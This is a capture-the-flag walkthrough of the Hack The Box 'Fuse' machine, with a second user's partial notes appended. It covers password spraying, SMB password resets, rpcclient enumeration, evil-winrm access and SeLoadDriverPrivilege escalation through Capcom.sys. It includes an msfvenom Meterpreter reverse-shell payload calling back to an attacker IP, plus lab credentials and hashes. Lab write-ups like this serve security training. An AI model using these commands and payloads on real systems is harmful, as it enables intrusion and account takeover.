htb-fuse-nl

Hackthebox Fuse protected writeup by :  https://0xprashant.github.io/posts/htb-fuse/

Introduction@Fuse:~$

Column Details
Name Fuse
IP 10.10.10.193
Points 30
Os Windows
Difficulty Medium
Creator aas
Out On 13 June 2020

Brief@Fuse:~$

Got few usernames from the files from the website itself and making a custom wordlist from the website itself using cewl . Password Sparying using metasploit on the smb protocol , Got the correct username and password . Changed the password using smbpasswd and login to the rpcclient. Enumerating about printers . Got a password from the result , Again password sparying using crackmapexec on the winrm protocol got the username associated with it .Logged in using evil-winrm . The user is privileged to load the drivers as , And following an article compiling the necessary files using visual-studio and exploiting the SeLoadDriverPrivilege to get shell as administartor.

Summary :~$

  • GOt domain from enum4linux
  • Reading the execl-files got from website
  • Making a users.txt file for the users got from excel-files
  • making a custom-wordlist using cewl from the website itself
  • Bruteforce the smb protocol using metasploit and medusa
  • USing smbpasswd to reset the password of the user tlavel
  • Enumerating shares
  • Using rpcclient to enumerate users
  • Got printer information and a password from the enumprinters query
  • Login as svc-print
  • Got user.txt
  • Privilege-escalation by abusing SeLoadDriverPrivilege
  • Compling all the files
  • Generating a msf malicious file
  • Creating the registry key as the file capcom.sys using eoploaddriver.exe
  • Executing the ExploitCapcom.exe to run the shell.exe
  • Got shell as admin
  • Got root.txt

Pwned

                                                                                                                                                      fuse evil-winrm -u Administrator -H 370ddcf45959b2293427baa70376e14e -i fuse.htb                                                                   evil-winrm                                                                                                                                            Evil-WinRM shell v2.3                                                                                                                                                                                                                                                                                       Info: Establishing connection to remote endpoint
00:02

Recon

Nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69

➜  fuse nmap -sV -sC -v -T4 -oA scans/nmap.full -p- fuse.htb
# Nmap 7.80 scan initiated Sat Jun 13 21:00:25 2020 as: nmap -sV -sC -v -T4 -oA scans/nmap.full -p- fuse.htb
Nmap scan report for fuse.htb (10.10.10.193)
Host is up (0.34s latency).
Not shown: 65514 filtered ports
PORT      STATE SERVICE      VERSION
53/tcp    open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
80/tcp    open  http         Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesnt have a title (text/html).
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-06-14 01:19:23Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: FABRICORP)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf       .NET Message Framing
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49670/tcp open  msrpc        Microsoft Windows RPC
49672/tcp open  msrpc        Microsoft Windows RPC
49690/tcp open  msrpc        Microsoft Windows RPC
49743/tcp open  msrpc        Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=6/13%Time=5EE5780A%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h33m10s, deviation: 4h02m31s, median: 13m08s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Fuse
|   NetBIOS computer name: FUSE\x00
|   Domain name: fabricorp.local
|   Forest name: fabricorp.local
|   FQDN: Fuse.fabricorp.local
|_  System time: 2020-06-13T18:21:53-07:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-06-14T01:21:55
|_  start_date: 2020-06-13T19:13:43

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jun 13 21:11:22 2020 -- 1 IP address (1 host up) scanned in 657.60 seconds

So many ports are opened , interesting ones are DNS , SMB ,Winrm , HTTP

Port 80 (HTTP)

Port-80

the fuse.htb is redirected to fuse.fabricorp.local …. added it to the /etc/hosts file

Fter adding and doing a refresh

Papercut

There is a papercut runningb on this http port . And there are also some excel files

Download the Excel files

I downloaded all the three files and opened them

1.

Excel files

2.

Excel files

3.

Excel file

These files contain some usernames i just extracted them all and save them in a users.txt

SMB Protocol

I tried to check if anonymous login is allowed or not on smb

1
2
3
4
5
6
7

➜  prashant smbclient -L fuse.htb
Enter WORKGROUP\roots password: 
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
SMB1 disabled -- no workgroup available

Okay…so the anonymous login is allowed but we can not list the shares .

Enum4linux

1
2

➜  prashant enum4linux fuse.htb
Domain Name: FABRICORP

Got nothing rather than a domain-name : FABRICORP

Password Spraying on smb protocol

users.txt

1
2
3
4
5

➜  fuse cat users.txt 
pmerton
tlavel
sthompson
bhult

These excel-files contain some usernames i just extracted them all and save them in a users.txt

Now what ??

After some time i decided to build a custom-wordlist from the website using cewl so i can bruteforce the login on smb protocol

1
2

➜  fuse cewl -d 5 -m 3 -w wordlist http://fuse.fabricorp.local/papercut/logs/html/index.htm --with-numbers 
CeWL 5.4.8 (Inclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/)

i tried password spraying with the same users.txt file using metasploit on the smb protocol

Using metasploit

The module i used in msf is auxiliary/scanner/smb/smb_login to bruteforce the login

1
2
3
4
5
6
7
8
9
10
11
12

msf5 > use auxiliary/scanner/smb/smb_login                                                                    
msf5 auxiliary(scanner/smb/smb_login) > set pass_file wordlist                                 
pass_file => wordlist
msf5 auxiliary(scanner/smb/smb_login) > set USER_file users.txt 
USER_file => users.txt   
msf5 auxiliary(scanner/smb/smb_login) > set RHOSTS fuse.htb                                                                                          
RHOSTS => fuse.htb                                                                                                                    
msf5 auxiliary(scanner/smb/smb_login) >    
msf5 auxiliary(scanner/smb/smb_login) > run

[+] 10.10.10.193:445      - 10.10.10.193:445 - Success: '.\tlavel:Fabricorp01'
[+] 10.10.10.193:445      - 10.10.10.193:445 - Success: '.\bhult:Fabricorp01'

Using medusa

1
2
3
4
5
6
7

➜  fuse medusa -h fuse.htb -U users.txt -P wordlist -M smbnt 

Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>


ACCOUNT FOUND: [smbnt] Host: fuse.htb User: tlavel Password: Fabricorp01 [SUCCESS (0x000224:STATUS_PASSWORD_MUST_CHANGE)]
ACCOUNT FOUND: [smbnt] Host: fuse.htb User: bhult Password: Fabricorp01 [SUCCESS (0x000224:STATUS_PASSWORD_MUST_CHANGE)]

As i can see now that password is Fabricorp01 on which it got SUCCESS for both the users tlavel and bhult but it also says STATUS_PASSWORD_MUST_CHANGE.

Login using smbclient

1
2
3

➜  fuse smbclient -L fuse.htb -U tlavel        
Enter WORKGROUP\tlavel's password: 
session setup failed: NT_STATUS_LOGON_FAILURE

But i got the same error as got previously in medusa

Well we can reset the password using smbpasswd of a remote machine also if we know its old password…And since i know it so i can simply chnage the password

Changing smb password

1
2
3
4
5

➜  fuse smbpasswd -r fuse.htb -U tlavel
Old SMB password:
New SMB password:
Retype new SMB password:
Password changed for user tlavel on fuse.htb.

And yeah now i can list shares as user tlavel

1
2
3
4
5
6
7
8
9
10
11
12
13

➜  fuse smbclient -L fuse.htb -U tlavel
Enter WORKGROUP\tlavels password: 

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	HP-MFT01        Printer   HP-MFT01
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share 
	print$          Disk      Printer Drivers
	SYSVOL          Disk      Logon server share 
SMB1 disabled -- no workgroup available

After enumerating all the shares got nothing actually or i cant figured out thae thing i need.

Enumerating using rpcclient

I can reset the password again and login myself to rpcclient

1
2
3

➜  fuse rpcclient -U FABRICORP\\tlavel 10.10.10.193
Enter FABRICORP\tlavel's password: 
rpcclient $>

Enum users

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[svc-print] rid:[0x450]
user:[bnielson] rid:[0x451]
user:[sthompson] rid:[0x641]
user:[tlavel] rid:[0x642]
user:[pmerton] rid:[0x643]
user:[svc-scan] rid:[0x645]
user:[bhult] rid:[0x1bbd]
user:[dandrews] rid:[0x1bbe]
user:[mberbatov] rid:[0x1db1]
user:[astein] rid:[0x1db2]
user:[dmuir] rid:[0x1db3]
rpcclient $>

Okay…so i got some usernames here and i saved them to another file called users

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39

rpcclient $> enumprivs
found 35 privileges

SeCreateTokenPrivilege 		0:2 (0x0:0x2)
SeAssignPrimaryTokenPrivilege 		0:3 (0x0:0x3)
SeLockMemoryPrivilege 		0:4 (0x0:0x4)
SeIncreaseQuotaPrivilege 		0:5 (0x0:0x5)
SeMachineAccountPrivilege 		0:6 (0x0:0x6)
SeTcbPrivilege 		0:7 (0x0:0x7)
SeSecurityPrivilege 		0:8 (0x0:0x8)
SeTakeOwnershipPrivilege 		0:9 (0x0:0x9)
SeLoadDriverPrivilege 		0:10 (0x0:0xa)
SeSystemProfilePrivilege 		0:11 (0x0:0xb)
SeSystemtimePrivilege 		0:12 (0x0:0xc)
SeProfileSingleProcessPrivilege 		0:13 (0x0:0xd)
SeIncreaseBasePriorityPrivilege 		0:14 (0x0:0xe)
SeCreatePagefilePrivilege 		0:15 (0x0:0xf)
SeCreatePermanentPrivilege 		0:16 (0x0:0x10)
SeBackupPrivilege 		0:17 (0x0:0x11)
SeRestorePrivilege 		0:18 (0x0:0x12)
SeShutdownPrivilege 		0:19 (0x0:0x13)
SeDebugPrivilege 		0:20 (0x0:0x14)
SeAuditPrivilege 		0:21 (0x0:0x15)
SeSystemEnvironmentPrivilege 		0:22 (0x0:0x16)
SeChangeNotifyPrivilege 		0:23 (0x0:0x17)
SeRemoteShutdownPrivilege 		0:24 (0x0:0x18)
SeUndockPrivilege 		0:25 (0x0:0x19)
SeSyncAgentPrivilege 		0:26 (0x0:0x1a)
SeEnableDelegationPrivilege 		0:27 (0x0:0x1b)
SeManageVolumePrivilege 		0:28 (0x0:0x1c)
SeImpersonatePrivilege 		0:29 (0x0:0x1d)
SeCreateGlobalPrivilege 		0:30 (0x0:0x1e)
SeTrustedCredManAccessPrivilege 		0:31 (0x0:0x1f)
SeRelabelPrivilege 		0:32 (0x0:0x20)
SeIncreaseWorkingSetPrivilege 		0:33 (0x0:0x21)
SeTimeZonePrivilege 		0:34 (0x0:0x22)
SeCreateSymbolicLinkPrivilege 		0:35 (0x0:0x23)
SeDelegateSessionUserImpersonatePrivilege 		0:36 (0x0:0x24)
rpcclient $>

The user have some pretty good privileges on the machine

The website was about printers , Better if we just do some enum on printers.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37

      adddriver		Add a print driver
     addprinter		Add a printer
      deldriver		Delete a printer driver
    deldriverex		Delete a printer driver with files
       enumdata		Enumerate printer data
     enumdataex		Enumerate printer data for a key
        enumkey		Enumerate printer keys
       enumjobs		Enumerate print jobs
         getjob		Get print job
         setjob		Set print job
      enumports		Enumerate printer ports
    enumdrivers		Enumerate installed printer drivers
   enumprinters		Enumerate printers
        getdata		Get print driver data
      getdataex		Get printer driver data with keyname
      getdriver		Get print driver information
   getdriverdir		Get print driver upload directory
getdriverpackagepath		Get print driver package download directory
     getprinter		Get printer info
    openprinter		Open printer handle
 openprinter_ex		Open printer handle
      setdriver		Set printer driver
getprintprocdir		Get print processor directory
        addform		Add form
        setform		Set form
        getform		Get form
     deleteform		Delete form
      enumforms		Enumerate forms
     setprinter		Set printer comment
 setprintername		Set printername
 setprinterdata		Set REG_SZ printer data
       rffpcnex		Rffpcnex test
     printercmp		Printer comparison test
      enumprocs		Enumerate Print Processors
enumprocdatatypes		Enumerate Print Processor Data Types
   enummonitors		Enumerate Print Monitors
createprinteric		Create Printer IC

There are some pretty good commands regarding the printers

enumprinters Enumerate printers

I cant list and enumerate the printers by using enumprinters

1
2
3
4
5
6
7

rpcclient $> enumprinters
	flags:[0x800000]
	name:[\\10.10.10.193\HP-MFT01]
	description:[\\10.10.10.193\HP-MFT01,HP Universal Printing PCL 6,Central (Near IT, scan2docs password: $fab@s3Rv1ce$1)]
	comment:[]

rpcclient $>

And herew I got lucky , Got a password here $fab@s3Rv1ce$1

Username spraying on winrm protocol

Now…since the winrm port is opened , And i can use crackmapexec or metasploit to spray usernames that i got from the rpcclient using enumdomusers

Using metasploit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26

msf5 auxiliary(scanner/winrm/winrm_login) > set PASSWORD '$fab@s3Rv1ce$1'                                                                
PASSWORD => $fab@s3Rv1ce$1                                                                    
msf5 auxiliary(scanner/winrm/winrm_login) > set USER_FILE users                                                                                  
USER_FILE => users                                                                                            
msf5 auxiliary(scanner/winrm/winrm_login) > set RHOSTS 10.10.10.193                                                                                       
RHOSTS => 10.10.10.193                                                                                                                         
msf5 auxiliary(scanner/winrm/winrm_login) >                                                                                       
msf5 auxiliary(scanner/winrm/winrm_login) > run  
[!] No active DB -- Credential data will not be saved!
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\DefaultAccount:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\Administrator:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\krbtgt:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\pmerton:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\tlavel:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\sthompson:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\bhult:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\bnielson:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\dandrews:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\mberbatov:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\astein:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\dmuir:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\svc-scan:$fab@s3Rv1ce$1 (Incorrect: )
[+] 10.10.10.193:5985 - Login Successful: WORKSTATION\svc-print:$fab@s3Rv1ce$1
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\Guest:$fab@s3Rv1ce$1 (Incorrect: )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

using crackmapexec

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

➜  fuse crackmapexec winrm -u users -p '$fab@s3Rv1ce$1' -d FABRICORP fuse.htb
WINRM       10.10.10.193    5985   fuse.htb         [*] http://10.10.10.193:5985/wsman
WINRM       10.10.10.193    5985   fuse.htb         [-] FABRICORP\DefaultAccount:$fab@s3Rv1ce$1 "Failed to authenticate the user DefaultAccount with ntlm"
WINRM       10.10.10.193    5985   fuse.htb         [-] FABRICORP\Administrator:$fab@s3Rv1ce$1 "Failed to authenticate the user Administrator with ntlm"
WINRM       10.10.10.193    5985   fuse.htb         [-] FABRICORP\krbtgt:$fab@s3Rv1ce$1 "Failed to authenticate the user krbtgt with ntlm"
WINRM       10.10.10.193    5985   fuse.htb         [-] FABRICORP\pmerton:$fab@s3Rv1ce$1 "Failed to authenticate the user pmerton with ntlm"
WINRM       10.10.10.193    5985   fuse.htb         [-] FABRICORP\tlavel:$fab@s3Rv1ce$1 "Failed to authenticate the user tlavel with ntlm"
WINRM       10.10.10.193    5985   fuse.htb         [-] FABRICORP\sthompson:$fab@s3Rv1ce$1 "Failed to authenticate the user sthompson with ntlm"
WINRM       10.10.10.193    5985   fuse.htb         [-] FABRICORP\bhult:$fab@s3Rv1ce$1 "Failed to authenticate the user bhult with ntlm"
WINRM       10.10.10.193    5985   fuse.htb         [-] FABRICORP\bnielson:$fab@s3Rv1ce$1 "Failed to authenticate the user bnielson with ntlm"
WINRM       10.10.10.193    5985   fuse.htb         [-] FABRICORP\dandrews:$fab@s3Rv1ce$1 "Failed to authenticate the user dandrews with ntlm"
WINRM       10.10.10.193    5985   fuse.htb         [-] FABRICORP\mberbatov:$fab@s3Rv1ce$1 "Failed to authenticate the user mberbatov with ntlm"
WINRM       10.10.10.193    5985   fuse.htb         [-] FABRICORP\astein:$fab@s3Rv1ce$1 "Failed to authenticate the user astein with ntlm"
WINRM       10.10.10.193    5985   fuse.htb         [-] FABRICORP\dmuir:$fab@s3Rv1ce$1 "Failed to authenticate the user dmuir with ntlm"
WINRM       10.10.10.193    5985   fuse.htb         [-] FABRICORP\svc-scan:$fab@s3Rv1ce$1 "Failed to authenticate the user svc-scan with ntlm"
WINRM       10.10.10.193    5985   fuse.htb         [+] FABRICORP\svc-print:$fab@s3Rv1ce$1 (Pwn3d!)

The user is svc-print and i can login myself to the machine using evil-winrm

1
2
3
4
5
6
7
8

➜  fuse evil-winrm -u svc-print -p '$fab@s3Rv1ce$1' -i fuse.htb                    

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-print\Documents> whoami
fabricorp\svc-print

Got user.txt

1
2

*Evil-WinRM* PS C:\Users\svc-print\desktop> type user.txt
3148b09cce76eee40d9bc602744269c1

Privilege escaltion

Now its time for escalating the privileges

whoami /all

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47

*Evil-WinRM* PS C:\Users\svc-print\desktop> whoami /all

USER INFORMATION
----------------

User Name           SID
=================== ==============================================
fabricorp\svc-print S-1-5-21-2633719317-1471316042-3957863514-1104


GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                            Attributes
========================================== ================ ============================================== ==================================================
Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Print Operators                    Alias            S-1-5-32-550                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
FABRICORP\IT_Accounts                      Group            S-1-5-21-2633719317-1471316042-3957863514-1604 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeLoadDriverPrivilege         Load and unload device drivers Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\svc-print\desktop>

The permission seems very suspicious

1

SeLoadDriverPrivilege         Load and unload device drivers Enabled

A quick google-search show me a good article on this

https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/

In this article its is shown that we cal load our own drivers and we can run a specific command as admin since we are already priviled to do it…

Compiling files

What i am gonna do is first compile both the two files

eoploaddriver.cpp

https://raw.githubusercontent.com/TarlogicSecurity/EoPLoadDriver/master/eoploaddriver.cpp

ExploitCapcom.cpp

https://github.com/tandasat/ExploitCapcom

I compiled both the files using Visual-studio and got the exe files as obvious

We need to specify our command in the files ExploitCapcom.cpp at the line 292 in function Launchshell()

1
2
3

static bool LaunchShell()
{
    TCHAR CommandLine[] = TEXT("C:\\Windows\\system32\\cmd.exe");

I changed the command to mine that will be a shell.exe so i can run my malicious binary created by msfvenom

1
2
3

static bool LaunchShell()
{
    TCHAR CommandLine[] = TEXT("C:\\test\\shell.exe");

And one more file that is capcom.sys

https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys

Now first we need to create a shell.exe using msfvenom

Creating the malicious file

1
2
3
4
5
6

➜  files msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.4 LPORT=4444 -f exe > shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes

And then upload all the four files to the machine

Uplaoding files

Uploading files

Upload file

After uploading all the four files….

Now Create the registry key under HKEY_CURRENT_USER (HKCU) and set driver configuration settings

The driver will be the file capcom.sys and its absolute path

Exploitation

1
2
3
4
5

*Evil-WinRM* PS C:\test> .\eoploaddriver.exe System\CurrentControlSet\MyService C:\test\capcom.sys
[+] Enabling SeLoadDriverPrivilege
[+] SeLoadDriverPrivilege Enabled
[+] Loading Driver: \Registry\User\S-1-5-21-2633719317-1471316042-3957863514-1104\System\CurrentControlSet\MyService
NTSTATUS: 00000000, WinError: 0

Now start listner on metasploit

and run the file .\ExploitCapcom.exe for the final exploitation

Execute the NTLoadDriver function, specifying the registry key previously created

1
2
3
4
5
6
7
8
9

*Evil-WinRM* PS C:\test> .\ExploitCapcom.exe                                                                              
[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000064
[*] Shellcode was placed at 000002B6CF0B0008
[+] Shellcode was executed
[+] Token stealing was successful
[+] The SYSTEM shell was launched
[*] Press any key to exit this program
*Evil-WinRM* PS C:\test>

And on our listener we got the shell as admin

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.4:4444 
[*] Sending stage (176195 bytes) to 10.10.10.193
[*] Meterpreter session 1 opened (10.10.14.4:4444 -> 10.10.10.193:50134) at 2020-06-17 02:27:11 -0400

meterpreter > shell
Process 576 created.
Channel 1 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\test>whoami
whoami
nt authority\system

Got root.txt

1
2
3
4
5

C:\Users\Administrator\Desktop>type root.txt
type root.txt
39bb8e320aecfcdd345fc2e7be64ceb7

C:\Users\Administrator\Desktop>

And we pwned it …….

If u liked the writeup.Support a Poor Student to Get the OSCP-Cert Donation for OSCP

If you want to get notified as soon as i upload something new to my blog So just click on the bell icon you are seeing on the right side – > and allow push notification

Resources

Topic Url
Article on seloaddriverprivilege https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/
eoploaddriver.cpp https://raw.githubusercontent.com/TarlogicSecurity/EoPLoadDriver/master/eoploaddriver.cpp
ExploitCapcom.cpp https://github.com/tandasat/ExploitCapcom
capcom.sys https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys
smbpasswd rpcclient medusa crackmapexec SeLoadDriverPrivilege

below puckie’s way

1st a nmap scan

E:\PENTEST>nmap 10.10.10.193
Starting Nmap 7.70 ( https://nmap.org ) at 2020-06-17 11:38 W. Europe Summer Time
Nmap scan report for fuse.fabricorp.local (10.10.10.193)
Host is up (0.089s latency).
Not shown: 988 filtered ports
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl

Nmap done: 1 IP address (1 host up) scanned in 19.86 seconds

E:\PENTEST>

enumerate more

root@kali:~/htb/fuse# nmap -p53,80,88,135,139,389,445,3389 -A -T4 fabricorp.local
Starting Nmap 7.70 ( https://nmap.org ) at 2020-06-17 05:56 EDT
Nmap scan report for fabricorp.local (10.10.10.193)
Host is up (0.086s latency).
rDNS record for 10.10.10.193: fuse.fabricorp.local

PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings: 
| DNSVersionBindReqTCP: 
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods: 
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-06-17 10:13:52Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: FABRICORP)
3389/tcp filtered ms-wbt-server
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.70%I=7%D=6/17%Time=5EE9E8E5%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016|2012|2008|10 (91%)
OS CPE: cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_server_2012 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_10:1607
Aggressive OS guesses: Microsoft Windows Server 2016 (91%), Microsoft Windows Server 2012 (85%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (85%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows 10 1607 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h37m05s, deviation: 4h02m32s, median: 17m03s
| smb-os-discovery: 
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Fuse
| NetBIOS computer name: FUSE\x00
| Domain name: fabricorp.local
| Forest name: fabricorp.local
| FQDN: Fuse.fabricorp.local
|_ System time: 2020-06-17T03:16:16-07:00
| smb-security-mode: 
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode: 
| 2.02: 
|_ Message signing enabled and required
| smb2-time: 
| date: 2020-06-17 06:16:14
|_ start_date: 2020-06-17 00:32:55

TRACEROUTE (using port 135/tcp)
HOP RTT ADDRESS
1 85.26 ms 10.10.14.1
2 85.44 ms fuse.fabricorp.local (10.10.10.193)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 189.81 seconds
root@kali:~/htb/fuse#

.

.

=> users : pmerton , tlavel , bnielson

check for more users

E:\PENTEST>kerbrute_windows_amd64.exe userenum --dc fabricorp.local -d fabricorp userlist.txt

__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
